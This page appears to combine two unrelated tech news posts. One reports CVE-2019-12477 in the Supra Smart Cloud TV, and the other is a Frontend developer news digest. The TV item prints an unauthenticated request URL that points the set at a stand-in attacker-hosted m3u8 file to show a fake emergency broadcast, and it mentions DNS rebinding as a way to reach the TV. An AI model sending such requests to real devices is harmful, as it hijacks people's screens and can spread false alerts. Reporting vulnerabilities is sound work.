Supra Smart Cloud TV to be Hacked

Now hacker can replace video being watched with own content
04 June 2019   952

A vulnerability has been identified on the Supra Smart Cloud TV (CVE-2019-12477). It makes possible to replace the transmission currently being watched for the content of the attacker. As an example, the output of a bogus emergency warning is shown.

To attack, just send a specially designed network request that does not require authentication. In particular, hacker can contact the handler "/ remote / media_control? Action = setUri & uri =" by specifying the URL of the m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com / fake_broadcast_message.m3u8 ".

In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the request of a picture or using the DNS rebinding method).

Frontend News Digest 5 - 11.10

Three dots in JavaScript, when to use map instead of plain JS object, how to make first React Nattive app and much more
11 October 2019   199

Greetings! I hope your week went great! Here's new Frontend news digest.

One of the greatest things is this digest for newbies is a guid on how to create your first React Native app. Others may learn about the latest NestJS Addons: In-Memory DB update, three dots in JavaScript and interview with "adult" website dev

Guides

  • Clipping, Clipping, and More Clipping! 

Guide on how to use the CSS clip-path property to create interesting effects.

  • Trying to Make Sense of Gmail CSS Support

Highly specialized, but valuable for some specialists guide

  • The tale of three dots in Javascript

Tutorial about the usage of "three consecutive dots" in JS

  • When to Use Map instead of Plain JavaScript Object

Everything should be understandable from the heading, I believe.

  • How to make your first React Native app

You gonna learn how to create a new mobile appl using React Native Starter

Articles

  • ASPIRE: Ideals to Aspire to When Building Websites

Skilled developer made the case that sites should aspire to be Accessible, Secure, Performant, Inclusive, Responsive and Ethical.

  • Interview with Pornhub Team developer

Interesting interview with a guy that works for one of the most popular "adult" websites

  • Verify Phone Numbers On The Web with The SMS Receiver API

Preview of the in-development SMS Receiver API

Updates

  • Node Code Formatter

Automatically formats your code with your preferred code formatter

  • NestJS Addons: In-Memory DB

New version with built-in entity CrUD Controllers, whatever they are